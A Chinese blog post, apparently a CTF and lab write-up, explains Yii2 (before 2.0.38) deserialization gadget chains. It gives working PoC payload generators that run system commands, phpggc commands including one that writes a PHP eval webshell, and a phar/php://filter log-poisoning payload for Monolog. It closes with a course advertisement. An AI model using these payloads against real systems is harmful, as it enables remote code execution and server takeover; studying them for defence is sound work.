通过几道CTF题学习yii2框架

最新推荐文章于 2024-08-15 16:33:21 发布
最新推荐文章于 2024-08-15 16:33:21 发布
阅读量692 收藏 8
点赞数 11
文章标签: 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dzqxwzoe/article/details/138990525
版权

简介

Yii是一套基于组件、用于开发大型 Web 应用的高性能 PHP 框架,Yii2 2.0.38 之前的版本存在反序列化漏洞,程序在调用unserialize()时,攻击者可通过构造特定的恶意请求执行任意命令,本篇就分析一下yii2利用链以及如何自己去构造payload,并结合CTF题目去学习yii2框架

Yii2<2.0.38反序列化

安装:在 github.com/yiisoft/yii… 下载2.0.37的版本

然后在 yii-basic-app-2.0.37\basic\config\web.php里面往cookieValidationKey随意给点值,运行 php yii serve,新建一个控制器

yii-basic-app-2.0.37\basic\controllers\TestController.php

<?php
namespace app\controllers;
use yii\web\Controller;

class TestController extends Controller{public function actionTest($name){return unserialize($name);}
}

就可以进行测试了

?r=test/test&name=

链一

链的入口在

yii-basic-app-2.0.37\basic\vendor\yiisoft\yii2\db\BatchQueryResult.php

public function __destruct() {// make sure cursor is closed$this->reset();}

跟进$this->reset();

public function reset(){if ($this->_dataReader !== null) {$this->_dataReader->close();}

这里的$this->_dataReader可控,并调用了close()方法,那么可以找到一个类不存在close()方法,但存在__call方法就可以调用他了

yii-basic-app-2.0.37\basic\vendor\yiisoft\yii2-gii\src\Generator.php

public function __call($method, $attributes) {return $this->format($method, $attributes);}

这里的$methodclose$attributes为空,继续跟进format

public function format($formatter, $arguments = array()) {return call_user_func_array($this->getFormatter($formatter), $arguments);}

跟进getFormatter

public function getFormatter($formatter) {if (isset($this->formatters[$formatter])) {return $this->formatters[$formatter];}

似曾相识的代码,laravel5.8某条链就出现过,这里$this->formatters可控,也就是$this->getFormatter($formatter)这这个可控,但是$arguments的值我们无法控制,值为空

到这里可以执行phpinfo

<?php
namespace yii\db{class BatchQueryResult{private $_dataReader;public function __construct($_dataReader) {$this->_dataReader = $_dataReader;}}
}
namespace Faker{class Generator{protected $formatters = array();public function __construct($formatters) {$this->formatters = $formatters;}}
}
namespace {$a = new Faker\Generator(array('close'=>'phpinfo'));$b = new yii\db\BatchQueryResult($a);print(urlencode(serialize($b)));
}

但是我们想要rce的话,还要在yii2中已有的无参方法中进行挖掘

这里我们可以使用正则匹配直接搜索含有call_user_function的无参函数

call_user_func\(\$this->([a-zA-Z0-9]+), \$this->([a-zA-Z0-9]+)

然后找到下面两个都比较好用

yii-basic-app-2.0.37\basic\vendor\yiisoft\yii2\rest\IndexAction.php
public function run(){if ($this->checkAccess) {call_user_func($this->checkAccess, $this->id);}return $this->prepareDataProvider();}

yii-basic-app-2.0.37\basic\vendor\yiisoft\yii2\rest\CreateAction.php
public function run()
{if ($this->checkAccess) {call_user_func($this->checkAccess, $this->id);
}

这里的$this->checkAccess$this->id都是我们可控的

所以直接构造就行了

<?php
namespace yii\db{class BatchQueryResult{private $_dataReader;public function __construct($_dataReader) {$this->_dataReader = $_dataReader;}}
}
namespace Faker{class Generator{protected $formatters = array();public function __construct($formatters) {$this->formatters = $formatters;}}
}
namespace yii\rest{class CreateAction{public $checkAccess;public $id;public function __construct($checkAccess,$id){$this->checkAccess = $checkAccess;$this->id = $id;}}
}
namespace {$c = new yii\rest\CreateAction('system','whoami');$b = new Faker\Generator(array('close'=>array($c, 'run')));$a = new yii\db\BatchQueryResult($b);print(urlencode(serialize($a)));
}

链二

这个是yii2 2.0.37的另外一条链

起点和链一相同,是BatchQueryResult类的__destruct,然后是$this->_dataReader->close(),但是这里不找__call,我们去找存在close方法的类

找到yii-basic-app-2.0.37\basic\vendor\yiisoft\yii2\web\DbSession.php

class DbSession extends MultiFieldSession
{
...
public function close(){if ($this->getIsActive()) {// prepare writeCallback fields before session closes$this->fields = $this->composeFields();

这里跟进$this->composeFields()

abstract class MultiFieldSession extends Session
{
protected function composeFields($id = null, $data = null){$fields = $this->writeCallback ? call_user_func($this->writeCallback, $this) : [];

这里$this->writeCallback可控,$this是一个对象,所以这里调phpinfo的话应该不行,不过可以续上链一的run方法(即那个无参的方法)

这里直接构造即可

<?php
namespace yii\db{class BatchQueryResult{private $_dataReader;public function __construct($_dataReader) {$this->_dataReader = $_dataReader;}}
}
namespace yii\web{class DbSession{public $writeCallback;public function __construct($writeCallback) {$this->writeCallback = $writeCallback;}}
}
namespace yii\rest{class CreateAction{public $checkAccess;public $id;public function __construct($checkAccess,$id){$this->checkAccess = $checkAccess;$this->id = $id;}}
}
namespace {$c = new yii\rest\CreateAction('system','whoami');$b = new yii\web\DbSession(array($c, 'run'));$a = new yii\db\BatchQueryResult($b);print(urlencode(serialize($a)));
}

链三

我们可以在yii2 2.0.38commit看到他加了一个__wakeup

这里限制了链一的起点BatchQueryResult无法使用,后面的__call的链没有被破坏,所以我们继续寻找一个__destruct

yii-basic-app-2.0.37\basic\vendor\codeception\codeception\ext\RunProcess.php

public function __destruct() {$this->stopProcess();}

这里继续跟进stopProcess

public function stopProcess() {foreach (array_reverse($this->processes) as $process) {/** @var $process Process**/if (!$process->isRunning()) {continue;}

这里的$this->processes可控,所以可以利用$process->isRunning()来进行触发__call

后面的利用就和链一相同了

<?php
namespace Codeception\Extension{class RunProcess{private $processes = [];public function __construct($processes) {$this->processes[] = $processes;}}
}
namespace Faker{class Generator{protected $formatters = array();public function __construct($formatters) {$this->formatters = $formatters;}}
}
namespace yii\rest{class CreateAction{public $checkAccess;public $id;public function __construct($checkAccess,$id){$this->checkAccess = $checkAccess;$this->id = $id;}}
}
namespace {$c = new yii\rest\CreateAction('system','whoami');$b = new Faker\Generator(array('isRunning'=>array($c, 'run')));$a = new Codeception\Extension\RunProcess($b);print(urlencode(serialize($a)));
}

链四

同样的先找__destruct

yii-basic-app-2.0.37\basic\vendor\swiftmailer\swiftmailer\lib\classes\Swift\KeyCache\DiskKeyCache.php

public function __destruct() {foreach ($this->keys as $nsKey => $null) {$this->clearAll($nsKey);}}

这里$nsKey可控,跟进clearAll

public function clearAll($nsKey) {if (array_key_exists($nsKey, $this->keys)) {foreach ($this->keys[$nsKey] as $itemKey => $null) {$this->clearKey($nsKey, $itemKey);}if (is_dir($this->path.'/'.$nsKey)) {rmdir($this->path.'/'.$nsKey);}unset($this->keys[$nsKey]);}}

这里没有触发__call的地方,但是存在字符串的拼接,可以触发__toString

随便找找就找到了yii-basic-app-2.0.37\basic\vendor\codeception\codeception\src\Codeception\Util\XmlBuilder.php

public function __toString()
{return $this->__dom__->saveXML();
}

同样用他去触发__call

<?php
namespace {class Swift_KeyCache_DiskKeyCache{private $path;private $keys = [];public function __construct($path,$keys) {$this->path = $path;$this->keys = $keys;}}
}
namespace Codeception\Util{class XmlBuilder{protected $__dom__;public function __construct($__dom__) {$this->__dom__ = $__dom__;}}
}
namespace Faker{class Generator{protected $formatters = array();public function __construct($formatters) {$this->formatters = $formatters;}}
}
namespace yii\rest{class CreateAction{public $checkAccess;public $id;public function __construct($checkAccess,$id){$this->checkAccess = $checkAccess;$this->id = $id;}}
}
namespace {$c = new yii\rest\CreateAction('system','whoami');$b = new Faker\Generator(array('saveXML'=>array($c,'run')));$a = new Codeception\Util\XmlBuilder($b);$d = new Swift_KeyCache_DiskKeyCache($a,array('kawhi'=>'kawhi'));print(urlencode(serialize($d)));
}

phpggc

使用./phpggc -l yii2可以看到有两条yii2的链

可以使用如下命令快速得到链,-uurl编码

./phpggc Yii2/RCE1 system id -u

phpggc的链二的终点是一个eval,所以这里可以直接写shell-bbase64编码

./phpggc Yii2/RCE2 'file_put_contents("shell.php",base64_decode("PD9waHAgZXZhbCgkX1BPU1RbMV0pPz4="));' -b

CTF题目

[HMBCTF 2021]framework

把题目附件解压,看到html\controllers\SiteController.php

class SiteController extends Controller
{public function actionAbout($message = 'Hello'){$data = base64_decode($message);unserialize($data);}

这里可以这样传参

?r=site/about&message=

拿链一打了一下,发现一下system等函数被ban

这里用phpggc yii2的链二写一个shell进去,然后用蚁剑的 apache/moddisable,运行 /readflag 即可获取 flag

[CISCN2021 Quals]filter

据说这是配置文件里面的重要内容,或许对你有用!!

 'log' => ['traceLevel' => YII_DEBUG ? 0 : 0,'targets' => [['class' => 'yii\log\FileTarget','levels' => ['error'],'logVars' => [],],],],

看到附件的SiteController.php就改了这个地方

public function actionIndex() {$file = Yii::$app->request->get('file');$res = file_get_contents($file);file_put_contents($file,$res);return $this->render('index');}

yii框架的runtime/logs目录下有一个app.log

看一下依赖发现monolog符合

"require": {"php": ">=5.6.0","yiisoft/yii2": "~2.0.14","yiisoft/yii2-bootstrap": "~2.0.0","yiisoft/yii2-swiftmailer": "~2.0.0 || ~2.1.0","monolog/monolog":"1.19"},

首先清空日志文件

?file=php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../runtime/logs/app.log

phpggc生成

php -d'phar.readonly=0' ./phpggc Monolog/RCE1 "phpinfo" "1" --phar phar -o php://output | base64 -w0 | python -c "import sys;print(''.join(['=' + hex(ord(i))[2:].zfill(2) + '=00' for i in sys.stdin.read()]).upper())"

写入日志,注意最后面要加个字符a

/?file==50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2B=00=44=00=51=00=71=00=39=00=41=00=67=00=41=00=41=00=41=00=67=00=41=00=41=00=41=00=42=00=45=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=42=00=6D=00=41=00=67=00=41=00=41=00=54=00=7A=00=6F=00=7A=00=4D=00=6A=00=6F=00=69=00=54=00=57=00=39=00=75=00=62=00=32=00=78=00=76=00=5A=00=31=00=78=00=49=00=59=00=57=00=35=00=6B=00=62=00=47=00=56=00=79=00=58=00=46=00=4E=00=35=00=63=00=32=00=78=00=76=00=5A=00=31=00=56=00=6B=00=63=00=45=00=68=00=68=00=62=00=6D=00=52=00=73=00=5A=00=58=00=49=00=69=00=4F=00=6A=00=45=00=36=00=65=00=33=00=4D=00=36=00=4F=00=54=00=6F=00=69=00=41=00=43=00=6F=00=41=00=63=00=32=00=39=00=6A=00=61=00=32=00=56=00=30=00=49=00=6A=00=74=00=50=00=4F=00=6A=00=49=00=35=00=4F=00=69=00=4A=00=4E=00=62=00=32=00=35=00=76=00=62=00=47=00=39=00=6E=00=58=00=45=00=68=00=68=00=62=00=6D=00=52=00=73=00=5A=00=58=00=4A=00=63=00=51=00=6E=00=56=00=6D=00=5A=00=6D=00=56=00=79=00=53=00=47=00=46=00=75=00=5A=00=47=00=78=00=6C=00=63=00=69=00=49=00=36=00=4E=00=7A=00=70=00=37=00=63=00=7A=00=6F=00=78=00=4D=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=61=00=47=00=46=00=75=00=5A=00=47=00=78=00=6C=00=63=00=69=00=49=00=37=00=54=00=7A=00=6F=00=79=00=4F=00=54=00=6F=00=69=00=54=00=57=00=39=00=75=00=62=00=32=00=78=00=76=00=5A=00=31=00=78=00=49=00=59=00=57=00=35=00=6B=00=62=00=47=00=56=00=79=00=58=00=45=00=4A=00=31=00=5A=00=6D=00=5A=00=6C=00=63=00=6B=00=68=00=68=00=62=00=6D=00=52=00=73=00=5A=00=58=00=49=00=69=00=4F=00=6A=00=63=00=36=00=65=00=33=00=4D=00=36=00=4D=00=54=00=41=00=36=00=49=00=67=00=41=00=71=00=41=00=47=00=68=00=68=00=62=00=6D=00=52=00=73=00=5A=00=58=00=49=00=69=00=4F=00=30=00=34=00=37=00=63=00=7A=00=6F=00=78=00=4D=00=7A=00=6F=00=69=00=41=00=43=00=6F=00=41=00=59=00=6E=00=56=00=6D=00=5A=00=6D=00=56=00=79=00=55=00=32=00=6C=00=36=00=5A=00=53=00=49=00=37=00=61=00=54=00=6F=00=74=00=4D=00=54=00=74=00=7A=00=4F=00=6A=00=6B=00=36=00=49=00=67=00=41=00=71=00=41=00=47=00=4A=00=31=00=5A=00=6D=00=5A=00=6C=00=63=00=69=00=49=00=37=00=59=00=54=00=6F=00=78=00=4F=00=6E=00=74=00=70=00=4F=00=6A=00=41=00=37=00=59=00=54=00=6F=00=79=00=4F=00=6E=00=74=00=70=00=4F=00=6A=00=41=00=37=00=63=00=7A=00=6F=00=78=00=4F=00=69=00=49=00=78=00=49=00=6A=00=74=00=7A=00=4F=00=6A=00=55=00=36=00=49=00=6D=00=78=00=6C=00=64=00=6D=00=56=00=73=00=49=00=6A=00=74=00=4F=00=4F=00=33=00=31=00=39=00=63=00=7A=00=6F=00=34=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=73=00=5A=00=58=00=5A=00=6C=00=62=00=43=00=49=00=37=00=54=00=6A=00=74=00=7A=00=4F=00=6A=00=45=00=30=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=70=00=62=00=6D=00=6C=00=30=00=61=00=57=00=46=00=73=00=61=00=58=00=70=00=6C=00=5A=00=43=00=49=00=37=00=59=00=6A=00=6F=00=78=00=4F=00=33=00=4D=00=36=00=4D=00=54=00=51=00=36=00=49=00=67=00=41=00=71=00=41=00=47=00=4A=00=31=00=5A=00=6D=00=5A=00=6C=00=63=00=6B=00=78=00=70=00=62=00=57=00=6C=00=30=00=49=00=6A=00=74=00=70=00=4F=00=69=00=30=00=78=00=4F=00=33=00=4D=00=36=00=4D=00=54=00=4D=00=36=00=49=00=67=00=41=00=71=00=41=00=48=00=42=00=79=00=62=00=32=00=4E=00=6C=00=63=00=33=00=4E=00=76=00=63=00=6E=00=4D=00=69=00=4F=00=32=00=45=00=36=00=4D=00=6A=00=70=00=37=00=61=00=54=00=6F=00=77=00=4F=00=33=00=4D=00=36=00=4E=00=7A=00=6F=00=69=00=59=00=33=00=56=00=79=00=63=00=6D=00=56=00=75=00=64=00=43=00=49=00=37=00=61=00=54=00=6F=00=78=00=4F=00=33=00=4D=00=36=00=4E=00=7A=00=6F=00=69=00=63=00=47=00=68=00=77=00=61=00=57=00=35=00=6D=00=62=00=79=00=49=00=37=00=66=00=58=00=31=00=7A=00=4F=00=6A=00=45=00=7A=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=69=00=64=00=57=00=5A=00=6D=00=5A=00=58=00=4A=00=54=00=61=00=58=00=70=00=6C=00=49=00=6A=00=74=00=70=00=4F=00=69=00=30=00=78=00=4F=00=33=00=4D=00=36=00=4F=00=54=00=6F=00=69=00=41=00=43=00=6F=00=41=00=59=00=6E=00=56=00=6D=00=5A=00=6D=00=56=00=79=00=49=00=6A=00=74=00=68=00=4F=00=6A=00=45=00=36=00=65=00=32=00=6B=00=36=00=4D=00=44=00=74=00=68=00=4F=00=6A=00=49=00=36=00=65=00=32=00=6B=00=36=00=4D=00=44=00=74=00=7A=00=4F=00=6A=00=45=00=36=00=49=00=6A=00=45=00=69=00=4F=00=33=00=4D=00=36=00=4E=00=54=00=6F=00=69=00=62=00=47=00=56=00=32=00=5A=00=57=00=77=00=69=00=4F=00=30=00=34=00=37=00=66=00=58=00=31=00=7A=00=4F=00=6A=00=67=00=36=00=49=00=67=00=41=00=71=00=41=00=47=00=78=00=6C=00=64=00=6D=00=56=00=73=00=49=00=6A=00=74=00=4F=00=4F=00=33=00=4D=00=36=00=4D=00=54=00=51=00=36=00=49=00=67=00=41=00=71=00=41=00=47=00=6C=00=75=00=61=00=58=00=52=00=70=00=59=00=57=00=78=00=70=00=65=00=6D=00=56=00=6B=00=49=00=6A=00=74=00=69=00=4F=00=6A=00=45=00=37=00=63=00=7A=00=6F=00=78=00=4E=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=59=00=6E=00=56=00=6D=00=5A=00=6D=00=56=00=79=00=54=00=47=00=6C=00=74=00=61=00=58=00=51=00=69=00=4F=00=32=00=6B=00=36=00=4C=00=54=00=45=00=37=00=63=00=7A=00=6F=00=78=00=4D=00=7A=00=6F=00=69=00=41=00=43=00=6F=00=41=00=63=00=48=00=4A=00=76=00=59=00=32=00=56=00=7A=00=63=00=32=00=39=00=79=00=63=00=79=00=49=00=37=00=59=00=54=00=6F=00=79=00=4F=00=6E=00=74=00=70=00=4F=00=6A=00=41=00=37=00=63=00=7A=00=6F=00=33=00=4F=00=69=00=4A=00=6A=00=64=00=58=00=4A=00=79=00=5A=00=57=00=35=00=30=00=49=00=6A=00=74=00=70=00=4F=00=6A=00=45=00=37=00=63=00=7A=00=6F=00=33=00=4F=00=69=00=4A=00=77=00=61=00=48=00=42=00=70=00=62=00=6D=00=5A=00=76=00=49=00=6A=00=74=00=39=00=66=00=58=00=30=00=46=00=41=00=41=00=41=00=41=00=5A=00=48=00=56=00=74=00=62=00=58=00=6B=00=45=00=41=00=41=00=41=00=41=00=47=00=59=00=61=00=33=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=49=00=41=00=41=00=41=00=41=00=64=00=47=00=56=00=7A=00=64=00=43=00=35=00=30=00=65=00=48=00=51=00=45=00=41=00=41=00=41=00=41=00=47=00=59=00=61=00=33=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=42=00=30=00=5A=00=58=00=4E=00=30=00=64=00=47=00=56=00=7A=00=64=00=4A=00=41=00=61=00=47=00=73=00=75=00=53=00=31=00=47=00=68=00=54=00=49=00=2B=00=6B=00=4B=00=58=00=33=00=45=00=68=00=2B=00=4D=00=44=00=71=00=54=00=76=00=6E=00=6F=00=41=00=67=00=41=00=41=00=41=00=45=00=64=00=43=00=54=00=55=00=49=00=3D=00a

保留phar的内容

/?file=php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../runtime/logs/app.log

最后用phar协议打一下

/?file=phar://../runtime/logs/app.log/test.txt

然后在根目录找到This_is_flaaagggg

然后用这个找一下flag即可

php -d'phar.readonly=0' ./phpggc Monolog/RCE1 "system" "cat /This_is_flaaagggg" --phar phar -o php://output | base64 -w0 | python -c "import sys;print(''.join(['=' + hex(ord(i))[2:].zfill(2) + '=00' for i in sys.stdin.read()]).upper())"

本文涉及相关实验:PHP反序列化漏洞实验 (通过本次实验,大家将会明白什么是反序列化漏洞,反序列化漏洞的成因以及如何挖掘和预防此类漏洞。接下来我将给各位同学划分一张学习计划表!

学习计划

那么问题又来了,作为萌新小白,我应该先学什么,再学什么?
既然你都问的这么直白了,我就告诉你,零基础应该从什么开始学起:

阶段一:初级网络安全工程师

接下来我将给大家安排一个为期1个月的网络安全初级计划,当你学完后,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web渗透、安全服务、安全分析等岗位;其中,如果你等保模块学的好,还可以从事等保工程师。

综合薪资区间6k~15k

1、网络安全理论知识(2天)
①了解行业相关背景,前景,确定发展方向。
②学习网络安全相关法律法规。
③网络安全运营的概念。
④等保简介、等保规定、流程和规范。(非常重要)

2、渗透测试基础(1周)
①渗透测试的流程、分类、标准
②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking
③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察
④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等

3、操作系统基础(1周)
①Windows系统常见功能和命令
②Kali Linux系统常见功能和命令
③操作系统安全(系统入侵排查/系统加固基础)

4、计算机网络基础(1周)
①计算机网络基础、协议和架构
②网络通信原理、OSI模型、数据转发流程
③常见协议解析(HTTP、TCP/IP、ARP等)
④网络攻击技术与网络安全防御技术
⑤Web漏洞原理与防御:主动/被动攻击、DDOS攻击、CVE漏洞复现

5、数据库基础操作(2天)
①数据库基础
②SQL语言基础
③数据库安全加固

6、Web渗透(1周)
①HTML、CSS和JavaScript简介
②OWASP Top10
③Web漏洞扫描工具
④Web渗透工具:Nmap、BurpSuite、SQLMap、其他(菜刀、漏扫等)

那么,到此为止,已经耗时1个月左右。你已经成功成为了一名“脚本小子”。那么你还想接着往下探索吗?

阶段二:中级or高级网络安全工程师(看自己能力)

综合薪资区间15k~30k

7、脚本编程学习(4周)
在网络安全领域。是否具备编程能力是“脚本小子”和真正网络安全工程师的本质区别。在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。在分秒必争的CTF竞赛中,想要高效地使用自制的脚本工具来实现各种目的,更是需要拥有编程能力。

零基础入门的同学,我建议选择脚本语言Python/PHP/Go/Java中的一种,对常用库进行编程学习
搭建开发环境和选择IDE,PHP环境推荐Wamp和XAMPP,IDE强烈推荐Sublime;

Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,没必要看完

用Python编写漏洞的exp,然后写一个简单的网络爬虫

PHP基本语法学习并书写一个简单的博客系统

熟悉MVC架构,并试着学习一个PHP框架或者Python框架 (可选)

了解Bootstrap的布局或者CSS。

阶段三:顶级网络安全工程师

如果你对网络安全入门感兴趣,那么你需要的话可以点击这里👉网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!

学习资料分享

当然,只给予计划不给予学习资料的行为无异于耍流氓,这里给大家整理了一份【282G】的网络安全工程师从入门到精通的学习资料包,可点击下方二维码链接领取哦。

程序员小强_
关注
Yii2 反序列化漏洞(CVE-2020-15148)复现
玄道的网安博客
12-16 9415
漏洞概述 Yii是一套基于组件、用于开发大型Web应用的高性能PHP框架Yii2 2.0.38 之前的版本存在反序列化漏洞,程序在调用unserialize 时,攻击者可通过构造特定的恶意请求执行任意命令。 环境搭建 到github上下载yii2的2.0.37版本 https://github.com/yiisoft/yii2/releases/tag/2.0.37 然后修改/config/web.php文件17行cookieValidationKey,可以随便定义 ...
yii2框架 反序列化漏洞复现
Zero_Adam的博客
06-19 1309
前言 跟着feng师傅再学习一下yii2的反序列化漏洞,提高代码审计能力 漏洞出现在yii2.0.38之前的版本中,在2.0.38进行了修复,CVE编号是CVE-2020-15148: Yii 2 (yiisoft/yii2) before version 2.0.38 is vulnerable to remote code execution if the application calls unserialize() on arbitrary user input. This is fixed in
yii2反序列化漏洞总结
unexpectedthing的博客
03-29 4758
文章目录yii2框架 反序列化漏洞复现yii 框架搭建过程CVE-2020-15148复现链子2链子3链子4链子5链子6参考链接 yii2框架 反序列化漏洞复现 yii 框架 Yii 是一个适用于开发 Web2.0 应用程序的高性能PHP 框架。 Yii 是一个通用的 Web 编程框架,即可以用于开发各种用 PHP 构建的 Web 应用。 因为基于组件的框架结构和设计精巧的缓存支持,它特别适合开发大型应用, 如门户网站、社区、内容管理系统(CMS)、 电子商务项目和 RESTful Web 服务等。 Yii
[CTFSHOW web267]Yii2 反序列化漏洞(CVE-2020-15148)
Landasika的博客
05-17 1370
目录 [CTFSHOW web267]Yii2 反序列化漏洞(CVE-2020-15148)一、什么是YiiYii 是什么YiiYii 最适合做什么?二、漏洞分析三、漏洞pocyii 2.0.37 以前yii 2.0.37 以后四、WEB_267 [CTFSHOW web267]Yii2 反序列化漏洞(CVE-2020-15148) 一、什么是Yii 参考官网 https://ww...
Yii2反序列化漏洞复现
SimoSimoSimo的博客
07-12 1510
Yii 是一个通用的 Web 编程框架,即可以用于开发各种用 PHP 构建的 Web 应用。 因为基于组件的框架结构和设计精巧的缓存支持,它特别适合开发大型应用, 如门户网站、社区、内容管理系统(CMS)、 电子商务项目和 RESTful Web 服务等。Yii2 2.0.38 以前的版本中存在反序列化漏洞,CVE编号是CVE-2020-15148到github上下载yii2的2.0.37版本打开 /config/web.php给17行的cookieValidationKey添加一个值,随便什么都行不添加就
【第62课】PHP反序列化&CLI框架类&PHPGGC生成器&TP&Yii&Laravel利用
最新发布
Lucker_YYY的博客
08-15 803
知识点:1、PHP-反序列化-开发框架类项目2、PHP-反序列化-Payload生成项目3、PHP-反序列化-Payload生成综合项目。
SUSCTF 2018 做记录
0verWatch的博客
06-05 7116
前言 最近好久都没做目,刚好上次搭的目还在,就不要浪费了,记录记录做过程吧 正文 minBash 这个目考的点是沙盒绕过,第一次玩这个东西??反正进去之后尝试ls,cat,file等各种那个命令均无效果,都会显示 -rbash: ls: command not found 发现有一篇好文章,有空瞅瞅:http://cauc.me/2017/11/16/python沙盒绕...
安恒9月赛部分复现记录
0verWatch的博客
09-30 1943
前言 赶紧趁着电脑的屏幕修好了,刚好安恒的web目有复现,赶紧做。。。。。又从这几个目里面学习到新知识了小结一下 正文 web babybypass 这个目我记得我当初做的时候是一直考虑着用$以及_去绕过这些数字字母之类的东西,突然发现他这个目里面把那个$以及_也经过了过滤,这样的话就少了很多可能性,而且这比原的限制长度小了,更有难度。现在就开始总结一下从这个目学到的知识点 1.ph...
Solve Me解记录
0verWatch的博客
08-14 3810
前言 前一阵子关注点在实战上,现在又回归CTF学习套路了,这个网站本来做了一半的目,今天终于把他补完了,学到了炒鸡多的东西啊~ 正文 Warm up 给出来一个密文和一段代码 1wMDEyY2U2YTY0M2NgMTEyZDQyMjAzNWczYjZgMWI4NTt3YWxmY= &amp;amp;amp;lt;?php error_reporting(0); require __D...
ctfshow-web入门-反序列化(前篇)
ccfly1012的博客
10-24 6069
目录 web254 web255 web256 web257 web258 web259 web260 web261 web262 web263 web264 web265 web266 web267 web254 <?php ​ /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-02 17:44:47 # @Last Modified by: h1xa # @Last Modified t..
CVE-2020-15148-bypasses:几条关于CVE-2020-15148(yii2反序列化)的绕过
03-09
CVE-2020-15148绕过 几条关于CVE-2020-15148(yii2反序列化)的绕过 poc1 这一个是在2.0.37版本可利用的,2.0.38恢复了这,也就是这个被分配了CVE-2020-15148,后面的三个是绕过 <?php namespace yii\rest{ class CreateAction{ public $checkAccess; public $id; public function __construct(){ $this->checkAccess = 'system'; $this->id = 'ls'; } } } namespace Faker{ use yii\rest\CreateAction; cla
所有Yii2 版本 反序例化漏洞修复
笨鸟的博客
11-24 777
什么是反序列化漏洞 也叫PHP对象注入,漏洞形成的根本原因是程序没有对用户输入的反序列化字符串进行检测,导致反序列化过程可以被恶意控制,进而造成代码执行、getshell等一系列不可控的后果。这个漏洞并不是PHP特有,在Java、Python其他语言也存在,原理基本相通。 比较典型的PHP反序化漏洞可能会用到的魔术方法 1.void __wakeup(void) 2.void __construct ([ mixed $args [, $... ]]) ...
从某达OA到Yii2框架的cookie反序列化漏洞研究
HUANGXIN9898的博客
10-05 599
自身的一个tdAuthcode加解密函数来加密payload**,从而可以绕过一些防御检测。某达oa。
Yii2反序列化漏洞
LYJ20010728的博客
05-27 950
Yii2反序列化漏洞环境搭建反序列化链寻找BatchQueryResult (版本<2.0.38)RunProcessSwift_KeyCache_DiskKeyCache 环境搭建 yii下载链接,选择版本<=2.0.37进行下载 自己在github上下载的yii2需要修改config/web.php文件里cookieValidationKey的值,随便什么值都行 切换到刚刚下载的yii框架根目录,执行命令php yii serve -port=xxxx,网站就运行起来了 反序列化链寻
yii2框架开发之安全xss、csrf、sql注入、文件上传漏洞攻击
西瓜的博客
02-21 8090
常见的漏洞攻击:1、xss:是跨站脚本攻击    分3类:1、存储型2、反射型3、蠕虫型2、csrf:是跨站请求伪造攻击    分2类:1、get型2、post型3、sql注入4、文件上传xss攻击:xss攻击可以:盗取用户账号、也可以盗取后进行非法转账、还可以篡改系统信息、网站挂马等存储型xss下面我们来看下盗号代码(存储型xss):1、通过在浏览器f12 console中输入:2、docume...
15-PHP代码审计——yii 2.0.37反序列化漏洞
网络安全
06-06 1224
Yii是一套基于组件、用于开发大型Web应用的高性能PHP框架Yii2 2.0.38 之前的版本存在反序列化漏洞,如果程序内部调用了unserialize() 反序列化时,那么程序就可能存在反序列化漏洞,攻击者可通过构造特定的恶意请求执行任意命令。 影响版本: yii2 v2.0.37版本以下 环境: yii-basic-app-2.0.37.tgz php7.0以上 poc: http://www.yii2.com/web/index.php?r=test/sss&.
Yii2框架 反序列化漏洞复现(CVE-2020-15148)
snowlyzz的博客
10-25 1776
yii2框架 反序列化漏洞复现
php探针入侵,【防护方案】Yii2 反序列化远程命令执行漏洞 (CVE-2020-15148)
weixin_36012511的博客
03-28 830
一、综述近日监测到,Yii Framework 2 在其 9月14 日发布的更新日志中公布了一个反序列化远程命令执行漏洞(CVE-2020-15148)。官方通过给yii\db\BatchQueryResult类加上__wakeup()函数,禁用了yii\db\BatchQueryResult的反序列化,阻止了应用程序对任意用户输入调用’unserialize()’造成的远程命令执行。Yii2 是...
CTF理论考核精选与答案解析
本资源是一份CTF理论考核库,涵盖了多个与网络安全、Web开发、操作系统、网络协议和数据库管理相关的内容。以下是一些重要的知识点总结: 1. **文件扩展名识别** - 在`readme.txt`文件中,文件扩展名是`.txt`,它...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值